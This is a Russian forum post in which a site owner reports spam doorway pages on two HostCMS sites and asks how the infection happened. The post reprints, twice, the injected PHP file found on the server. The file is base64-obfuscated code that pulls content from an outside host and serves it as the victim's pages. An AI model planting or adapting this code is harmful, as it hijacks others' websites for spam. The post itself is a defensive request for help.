Несанкционированное внедрение кода с дорвеем
artemluzin
3 ноября 2013 г.
Яндекс.Вебмастер начал ругаться на дорвейные страницы, которых на сайте никогда не было.
Страницы находились по адресу сайт.ru/downloads/
После долгих поисков удалось найти файл controller.php со странным содержанием:
Файл находился в папке /modules/lib/
После его удаления дорвейные страницы исчезли.
При копании в коде этого файла удалось найти ссылку
По этой ссылке как раз те страницы, которые добавлялись на сайт.
Это файл был найден на двух сайтах, которые находятся на разных аккаунтах хостинга reg.ru.
Один сайт на HostCMS 5.9, другой - на HostCMS 6.0.9
Сайт был поражен два месяца назад, а замечено было недавно, поэтому логов с хостинга нет.
Вопросы вот в чем:
Причина заражения украденные пароли на фтп или уязвимость системы?
Не осталось ли еще чего-нить лишнего на серваке?
Страницы находились по адресу сайт.ru/downloads/
После долгих поисков удалось найти файл controller.php со странным содержанием:
<?
$index="9a77bfedd16fd30e587f41b522c56267";
$GLOBALS['_1112515842_']=Array(base64_decode('cGFyc2' .'Vf' .'d' .'XJs'),base64_decode('' .'ZnNvY2tvcGV' .'u'),base64_decode('c3Ry' .'bG' .'Vu'),base64_decode('Zn' .'dyaXRl'),base64_decode('ZmVv' .'Zg=' .'='),base64_decode('Zm' .'dldHM='),base64_decode('c3Vic3Ry'),base64_decode('c' .'3R' .'y' .'c' .'G9z'),base64_decode('Zm' .'N' .'sb3Nl'),base64_decode('c3Ryc3' .'Ry'),base64_decode('a' .'GVhZ' .'GVy'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('aGVhZ' .'GVy'),base64_decode('' .'c3' .'Ryc3' .'Ry'),base64_decode('c3Ry' .'c3Ry'),base64_decode('' .'aGVhZGVy'),base64_decode('c' .'3R' .'yc' .'3Ry'),base64_decode('aG' .'VhZGVy'),base64_decode('' .'aGV' .'hZGVy')); ?><? function _714844447($i){$a=Array('aWQ=','aHR0cDovL3hxMi5ydS9kYXRhLw==','Lw==','','aG9zdA==','cG9ydA==','cG9ydA==','UE9TVCA=','cGF0aA==','IEhUVFAvMS4w','DQo=','SG9zdDog','aG9zdA==','DQo=','Q29udGVudC10eXBlOiB0ZXh0L2h0bWw=','DQo=','Q29udGVudC1sZW5ndGg6IA==','DQo=','Q29ubmVjdGlvbjogQ2xvc2U=','DQoNCg==','','DQoNCg==','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD1jcDEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9Y3AxMjUx');return base64_decode($a[$i]);} ?><? $_0=$_REQUEST[_714844447(0)];$_1=_714844447(1) .$index ._714844447(2) .$_0;$_2=_714844447(3);$_3=$GLOBALS['_1112515842_'][0]($_1);if($_4=$GLOBALS['_1112515842_'][1]($_3[_714844447(4)],!empty($_3[_714844447(5)])?$_3[_714844447(6)]:round(0+16+16+16+16+16))){$_5=_714844447(7) .$_3[_714844447(8)] ._714844447(9) ._714844447(10);$_5 .= _714844447(11) .$_3[_714844447(12)] ._714844447(13);$_5 .= _714844447(14) ._714844447(15);$_5 .= _714844447(16) .$GLOBALS['_1112515842_'][2]($_2) ._714844447(17);$_5 .= _714844447(18) ._714844447(19);$_5 .= $_2;$GLOBALS['_1112515842_'][3]($_4,$_5);$_6=_714844447(20);while(!$GLOBALS['_1112515842_'][4]($_4)){$_6 .= $GLOBALS['_1112515842_'][5]($_4,round(0+204.8+204.8+204.8+204.8+204.8));}$_7=$GLOBALS['_1112515842_'][6]($_6,$GLOBALS['_1112515842_'][7]($_6,_714844447(21))+round(0+2+2));$GLOBALS['_1112515842_'][8]($_4);}if($GLOBALS['_1112515842_'][9]($_0,_714844447(22))){$GLOBALS['_1112515842_'][10](_714844447(23));}elseif($GLOBALS['_1112515842_'][11]($_0,_714844447(24))){$GLOBALS['_1112515842_'][12](_714844447(25));}elseif($GLOBALS['_1112515842_'][13]($_0,_714844447(26))|| $GLOBALS['_1112515842_'][14]($_0,_714844447(27))){$GLOBALS['_1112515842_'][15](_714844447(28));}elseif($GLOBALS['_1112515842_'][16]($_0,_714844447(29))){$GLOBALS['_1112515842_'][17](_714844447(30));}else{$GLOBALS['_1112515842_'][18](_714844447(31));}echo $_7; ?>
$index="9a77bfedd16fd30e587f41b522c56267";
$GLOBALS['_1112515842_']=Array(base64_decode('cGFyc2' .'Vf' .'d' .'XJs'),base64_decode('' .'ZnNvY2tvcGV' .'u'),base64_decode('c3Ry' .'bG' .'Vu'),base64_decode('Zn' .'dyaXRl'),base64_decode('ZmVv' .'Zg=' .'='),base64_decode('Zm' .'dldHM='),base64_decode('c3Vic3Ry'),base64_decode('c' .'3R' .'y' .'c' .'G9z'),base64_decode('Zm' .'N' .'sb3Nl'),base64_decode('c3Ryc3' .'Ry'),base64_decode('a' .'GVhZ' .'GVy'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('aGVhZ' .'GVy'),base64_decode('' .'c3' .'Ryc3' .'Ry'),base64_decode('c3Ry' .'c3Ry'),base64_decode('' .'aGVhZGVy'),base64_decode('c' .'3R' .'yc' .'3Ry'),base64_decode('aG' .'VhZGVy'),base64_decode('' .'aGV' .'hZGVy')); ?><? function _714844447($i){$a=Array('aWQ=','aHR0cDovL3hxMi5ydS9kYXRhLw==','Lw==','','aG9zdA==','cG9ydA==','cG9ydA==','UE9TVCA=','cGF0aA==','IEhUVFAvMS4w','DQo=','SG9zdDog','aG9zdA==','DQo=','Q29udGVudC10eXBlOiB0ZXh0L2h0bWw=','DQo=','Q29udGVudC1sZW5ndGg6IA==','DQo=','Q29ubmVjdGlvbjogQ2xvc2U=','DQoNCg==','','DQoNCg==','LmNzcw==','Q29udGVudC1UeXBlOiB0ZXh0L2NzczsgY2hhcnNldD1jcDEyNTE=','LnBuZw==','Q29udGVudC1UeXBlOiBpbWFnZS9wbmc=','LmpwZw==','LmpwZWc=','Q29udGVudC1UeXBlOiBpbWFnZS9qcGVn','LmdpZg==','Q29udGVudC1UeXBlOiBpbWFnZS9naWY=','Q29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9Y3AxMjUx');return base64_decode($a[$i]);} ?><? $_0=$_REQUEST[_714844447(0)];$_1=_714844447(1) .$index ._714844447(2) .$_0;$_2=_714844447(3);$_3=$GLOBALS['_1112515842_'][0]($_1);if($_4=$GLOBALS['_1112515842_'][1]($_3[_714844447(4)],!empty($_3[_714844447(5)])?$_3[_714844447(6)]:round(0+16+16+16+16+16))){$_5=_714844447(7) .$_3[_714844447(8)] ._714844447(9) ._714844447(10);$_5 .= _714844447(11) .$_3[_714844447(12)] ._714844447(13);$_5 .= _714844447(14) ._714844447(15);$_5 .= _714844447(16) .$GLOBALS['_1112515842_'][2]($_2) ._714844447(17);$_5 .= _714844447(18) ._714844447(19);$_5 .= $_2;$GLOBALS['_1112515842_'][3]($_4,$_5);$_6=_714844447(20);while(!$GLOBALS['_1112515842_'][4]($_4)){$_6 .= $GLOBALS['_1112515842_'][5]($_4,round(0+204.8+204.8+204.8+204.8+204.8));}$_7=$GLOBALS['_1112515842_'][6]($_6,$GLOBALS['_1112515842_'][7]($_6,_714844447(21))+round(0+2+2));$GLOBALS['_1112515842_'][8]($_4);}if($GLOBALS['_1112515842_'][9]($_0,_714844447(22))){$GLOBALS['_1112515842_'][10](_714844447(23));}elseif($GLOBALS['_1112515842_'][11]($_0,_714844447(24))){$GLOBALS['_1112515842_'][12](_714844447(25));}elseif($GLOBALS['_1112515842_'][13]($_0,_714844447(26))|| $GLOBALS['_1112515842_'][14]($_0,_714844447(27))){$GLOBALS['_1112515842_'][15](_714844447(28));}elseif($GLOBALS['_1112515842_'][16]($_0,_714844447(29))){$GLOBALS['_1112515842_'][17](_714844447(30));}else{$GLOBALS['_1112515842_'][18](_714844447(31));}echo $_7; ?>
Файл находился в папке /modules/lib/
После его удаления дорвейные страницы исчезли.
При копании в коде этого файла удалось найти ссылку
По этой ссылке как раз те страницы, которые добавлялись на сайт.
Это файл был найден на двух сайтах, которые находятся на разных аккаунтах хостинга reg.ru.
Один сайт на HostCMS 5.9, другой - на HostCMS 6.0.9
Сайт был поражен два месяца назад, а замечено было недавно, поэтому логов с хостинга нет.
Вопросы вот в чем:
Причина заражения украденные пароли на фтп или уязвимость системы?
Не осталось ли еще чего-нить лишнего на серваке?
Авторизация
